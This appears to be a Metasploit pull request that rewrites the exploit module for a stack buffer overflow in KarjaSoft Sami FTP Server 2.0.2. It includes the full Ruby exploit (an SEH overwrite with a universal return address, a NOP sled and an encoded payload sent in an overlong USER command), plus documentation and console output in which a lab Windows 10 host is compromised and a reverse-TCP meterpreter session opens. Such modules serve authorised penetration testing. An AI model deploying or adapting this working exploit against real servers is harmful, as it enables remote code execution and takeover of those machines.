### PR TITLE
Update KarjaSoft Sami FTP Server v2.0.2 USER Overflow module

### DIFF
--- a/documentation/modules/exploit/windows/ftp/sami_ftpd_user.md
+++ b/documentation/modules/exploit/windows/ftp/sami_ftpd_user.md
@@ -1,0 +1,71 @@
+## Vulnerable Application
+
+This module exploits an unauthenticated stack buffer overflow in
+KarjaSoft Sami FTP Server version 2.0.2 by sending an overly long
+USER string during login.
+
+The payload is triggered when the administrator opens the application
+GUI. If the GUI window is open at the time of exploitation, the
+payload will be executed immediately. Keep this in mind when selecting
+payloads. The application will crash following execution of the
+payload and will not restart automatically.
+
+When the application is restarted, it will re-execute the payload
+unless the payload has been manually removed from the SamiFTP.binlog
+log file.
+
+This module has been tested successfully on Sami FTP Server versions:
+
+* 2.0.2 on Windows XP SP0 (x86)
+* 2.0.2 on Windows 7 SP1 (x86)
+* 2.0.2 on Windows 7 SP1 (x64)
+* 2.0.2 on Windows 10 (1909) (x64)
+
+## Verification Steps
+
+Download:
+
+* https://web.archive.org/web/20140218061003if_/http://www.karjasoft.com/files/samiftp/samiftpd_install.exe
+
+Metasploit:
+
+1. `msfconsole`
+1. `use exploit/windows/ftp/sami_ftpd_user`
+1. `set rhosts <rhosts>`
+1. `exploit`
+
+## Options
+
+## Scenarios
+
+### KarjaSoft Sami FTP Server version 2.0.2 on Windows 10 (1909) (x64)
+
+```
+msf6 > use exploit/windows/ftp/sami_ftpd_user 
+[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf6 exploit(windows/ftp/sami_ftpd_user) > set rhosts 172.16.191.199
+rhosts => 172.16.191.199
+msf6 exploit(windows/ftp/sami_ftpd_user) > check
+[*] 172.16.191.199:21 - The target appears to be vulnerable. Sami FTP Server version 2.0.2.
+msf6 exploit(windows/ftp/sami_ftpd_user) > run
+
+[*] Started reverse TCP handler on 172.16.191.192:4444 
+[*] 172.16.191.199:21 - Executing automatic check (disable AutoCheck to override)
+[+] 172.16.191.199:21 - The target appears to be vulnerable. Sami FTP Server version 2.0.2.
+[*] 172.16.191.199:21 - Sending payload (1414 bytes) ...
+[*] Sending stage (175174 bytes) to 172.16.191.199
+[*] Meterpreter session 1 opened (172.16.191.192:4444 -> 172.16.191.199:49874) at 2021-02-19 20:24:31 -0500
+
+meterpreter > getuid
+Server username: DESKTOP-6VPIDIM\user
+meterpreter > sysinfo
+Computer        : DESKTOP-6VPIDIM
+OS              : Windows 10 (10.0 Build 18363).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 15
+Meterpreter     : x86/windows
+meterpreter > 
+```
+

--- a/modules/exploits/windows/ftp/sami_ftpd_user.rb
+++ b/modules/exploits/windows/ftp/sami_ftpd_user.rb
@@ -8,62 +8,85 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::Remote::Seh
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'		=> 'KarjaSoft Sami FTP Server v2.02 USER Overflow',
-      'Description'	=> %q{
-          This module exploits the KarjaSoft Sami FTP Server version 2.02
-        by sending an excessively long USER string. The stack is overwritten
-        when the administrator attempts to view the FTP logs. Therefore, this exploit
-        is passive and requires end-user interaction. Keep this in mind when selecting
-        payloads. When the server is restarted, it will re-execute the exploit until
-        the logfile is manually deleted via the file system.
-      },
-      'Author'	=> [ 'aushack' ],
-      'Arch'		=> [ ARCH_X86 ],
-      'License'	=> MSF_LICENSE,
-      'Stance'	=> Msf::Exploit::Stance::Passive,
-      'References'	=>
-        [
-          # This exploit appears to have been reported multiple times.
-          [ 'CVE', '2006-0441'],
-          [ 'CVE', '2006-2212'],
-          [ 'OSVDB', '25670'],
-          [ 'BID', '16370'],
-          [ 'BID', '22045'],
-          [ 'BID', '17835'],
-          [ 'EDB', '1448'],
-          [ 'EDB', '1452'],
-          [ 'EDB', '1462'],
-          [ 'EDB', '3127'],
-          [ 'EDB', '3140']
-        ],
-      'DefaultOptions' =>
-        {
-          'EXITFUNC' => 'seh',
-        },
-      'Platform' 	=> ['win'],
-      'Privileged'	=> false,
-      'Payload'	=>
-        {
-          'Space'			=> 300,
-          'BadChars'		=> "\x00\x0a\x0d\x20\xff",
-          'StackAdjustment'	=> -3500,
-        },
-      'Targets' 	=>
-        [
-          [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll
-          [ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd11a9 } ], # p/p/r ws2help.dll
-          [ 'Windows 2000 Pro All - French',  { 'Ret' => 0x74fa12bc } ], # p/p/r ws2help.dll
-          [ 'Windows XP SP0/1 - English',     { 'Ret' => 0x71aa32ad } ], # p/p/r ws2help.dll
-        ],
-      'DisclosureDate' => '2006-01-24'))
+    super(
+      update_info(
+        info,
+        'Name'	=> 'KarjaSoft Sami FTP Server v2.0.2 USER Overflow',
+        'Description'	=> %q{
+          This module exploits an unauthenticated stack buffer overflow in
+          KarjaSoft Sami FTP Server version 2.0.2 by sending an overly long
+          USER string during login.
 
-    register_options(
-      [
-        Opt::RPORT(21),
-      ])
+          The payload is triggered when the administrator opens the application
+          GUI. If the GUI window is open at the time of exploitation, the
+          payload will be executed immediately. Keep this in mind when selecting
+          payloads. The application will crash following execution of the
+          payload and will not restart automatically.
+
+          When the application is restarted, it will re-execute the payload
+          unless the payload has been manually removed from the SamiFTP.binlog
+          log file.
+
+          This module has been tested successfully on Sami FTP Server versions:
+          2.0.2 on Windows XP SP0 (x86);
+          2.0.2 on Windows 7 SP1 (x86);
+          2.0.2 on Windows 7 SP1 (x64); and
+          2.0.2 on Windows 10 (1909) (x64).
+        },
+        'Author'	=> [
+          'Muhammad Ahmed Siddiqui', # Discovery
+          'Critical Security', # Perl exploit
+          'n30m1nd', # Python exploit - SEH overwrite with 2.0.2 universal tmp01.dll p/p/r
+          'aushack', # Metasploit
+          'bcoles' # Metasploit
+        ],
+        'Arch'	=> [ ARCH_X86 ],
+        'License'	=> MSF_LICENSE,
+        'References'	=>
+          [
+            # This vulnerability appears to have been reported multiple times.
+            ['CVE', '2006-0441'],
+            ['CVE', '2006-2212'],
+            ['OSVDB', '25670'],
+            ['BID', '16370'],
+            ['BID', '22045'],
+            ['BID', '17835'],
+            ['EDB', '1448'],
+            ['EDB', '1452'],
+            ['EDB', '1462'],
+            ['EDB', '3127'],
+            ['EDB', '3140'],
+            ['EDB', '40675']
+          ],
+        'DefaultOptions' =>
+          {
+            'EXITFUNC' => 'seh'
+          },
+        'Platform' => ['win'],
+        'Privileged' => false,
+        'Payload'	=>
+          {
+            'Space'	=> 800,
+            'BadChars' => "\x00\x0a\x0d\x20\xff",
+            'EncoderType' => Msf::Encoder::Type::AlphanumMixed
+          },
+        'Targets' =>
+          [
+            ['Sami FTP Server version 2.0.2', { 'Ret' => 0x10022ADE }], # p/p/r tmp01.dll
+          ],
+        'Notes' => {
+          'Stability' => [ CRASH_SERVICE_DOWN ]
+        },
+        'DisclosureDate' => '2006-01-24'
+      )
+    )
+
+    register_options([
+      Opt::RPORT(21)
+    ])
   end
 
   def check
@@ -71,21 +94,37 @@ class MetasploitModule < Msf::Exploit::Remote
     banner = sock.get_once(-1, 3)
     disconnect
 
-    if (banner =~ /Sami FTP Server 2\.0\.2/)
-      return Exploit::CheckCode::Appears
+    unless banner.include?('Sami FTP Server')
+      return CheckCode::Safe('Target is not Sami FTP Server')
     end
-    return Exploit::CheckCode::Safe
+
+    if banner.include?('Sami FTP Server 2.0.2')
+      return CheckCode::Appears('Sami FTP Server version 2.0.2.')
+    end
+
+    CheckCode::Detected
   end
 
   def exploit
     connect
 
-    sploit = Rex::Text.rand_text_alphanumeric(596) + generate_seh_payload(target.ret)
+    nseh = "\xeb\x06"
+    nseh << rand_text_alpha(2)
+    seh = [target.ret].pack('V')
 
-    login = "USER #{sploit}\r\n"
-    login << "PASS " + Rex::Text.rand_char(payload_badchars)
+    user = rand_text_alpha(596)
+    user << nseh
+    user << seh
+    user << "\x90" * 10
+    user << payload.encoded
+    user << "\x90" * (800 - payload.encoded.length)
 
-    sock.put(login + "\r\n")
+    print_status("Sending payload (#{user.length} bytes) ...")
+    sock.put("USER #{user}\r\n")
+    sock.recv(4096)
+
+    sock.put("PASS #{Rex::Text.rand_char(payload_badchars)}\r\n")
+    sock.recv(4096)
 
     handler
     disconnect


### PR DESCRIPTION
Update KarjaSoft Sami FTP Server v2.0.2 USER Overflow module.

* Add documentation
* Update style to be compliant with Rubocop
* Add `AutoCheck`
* Add `authors` for discovery and previous exploits
* Add `notes`

This is effectively a re-write largely based on [n30m1nd's exploit](https://www.exploit-db.com/exploits/40675) which utilises SEH overwrite.

The payload `space` has been increased from `300` to `800`. The previous size was insufficient to fit most payloads. Bind and reverse shell/meterpreter payloads now fit easily.

The `targets` have been replaced with a universal p/p/r in `tmp01.dll`. This is significantly more reliable than the previous approach which used different offsets for `ws2help.dll` Windows DLLs.

This also allows the module to work on modern targets (including Windows 7 and Windows 10) instead of being restricted to Windows 2000/XP era systems (which is super important for a 15 year old vulnerability in software that no one uses).

## Vulnerable Application

This module exploits an unauthenticated stack buffer overflow in
KarjaSoft Sami FTP Server version 2.0.2 by sending an overly long
USER string during login.

The payload is triggered when the administrator opens the application
GUI. If the GUI window is open at the time of exploitation, the
payload will be executed immediately. Keep this in mind when selecting
payloads. The application will crash following execution of the
payload and will not restart automatically.

When the application is restarted, it will re-execute the payload
unless the payload has been manually removed from the SamiFTP.binlog
log file.

This module has been tested successfully on Sami FTP Server versions:

* 2.0.2 on Windows XP SP0 (x86)
* 2.0.2 on Windows 7 SP1 (x86)
* 2.0.2 on Windows 7 SP1 (x64)
* 2.0.2 on Windows 10 (1909) (x64)

## Verification Steps

Download:

* https://web.archive.org/web/20140218061003if_/http://www.karjasoft.com/files/samiftp/samiftpd_install.exe

Metasploit:

1. `msfconsole`
1. `use exploit/windows/ftp/sami_ftpd_user`
1. `set rhosts <rhosts>`
1. `exploit`

## Options

## Scenarios

### KarjaSoft Sami FTP Server version 2.0.2 on Windows 10 (1909) (x64)

```
msf6 > use exploit/windows/ftp/sami_ftpd_user 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/ftp/sami_ftpd_user) > set rhosts 172.16.191.199
rhosts => 172.16.191.199
msf6 exploit(windows/ftp/sami_ftpd_user) > check
[*] 172.16.191.199:21 - The target appears to be vulnerable. Sami FTP Server version 2.0.2.
msf6 exploit(windows/ftp/sami_ftpd_user) > run
[*] Started reverse TCP handler on 172.16.191.192:4444 
[*] 172.16.191.199:21 - Executing automatic check (disable AutoCheck to override)
[+] 172.16.191.199:21 - The target appears to be vulnerable. Sami FTP Server version 2.0.2.
[*] 172.16.191.199:21 - Sending payload (1414 bytes) ...
[*] Sending stage (175174 bytes) to 172.16.191.199
[*] Meterpreter session 1 opened (172.16.191.192:4444 -> 172.16.191.199:49874) at 2021-02-19 20:24:31 -0500
meterpreter > getuid
Server username: DESKTOP-6VPIDIM\user
meterpreter > sysinfo
Computer        : DESKTOP-6VPIDIM
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 15
Meterpreter     : x86/windows
meterpreter > 
```

